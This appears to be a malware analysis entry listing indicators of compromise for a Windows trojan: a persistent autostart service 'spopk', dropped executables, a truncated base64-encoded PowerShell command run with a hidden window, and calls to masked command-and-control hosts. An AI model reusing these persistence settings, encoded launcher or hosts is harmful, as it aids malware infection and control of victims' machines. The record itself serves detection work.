Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\spopk] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\spopk] 'ImagePath' = '"%WINDIR%\SysWOW64\msdrm\spopk.exe"'
- 'spopk' "%WINDIR%\SysWOW64\msdrm\spopk.exe"
- 'spopk' %WINDIR%\SysWOW64\msdrm\spopk.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe
- %WINDIR%\syswow64\msdrm\spopk.exe
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe в %WINDIR%\syswow64\msdrm\spopk.exe
- '22#.#47.142.214':80
- http://th####seofpeace.org/cgi-bin/NZdfyylt/
- http://22#.#47.142.214/wK48q6BNu/eTLv7DwwDqY99Pk/NrhhyCb1FUW/di9DWVN1D5/
- DNS ASK th####seofpeace.org
- '%HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe'
- '%WINDIR%\syswow64\msdrm\spopk.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)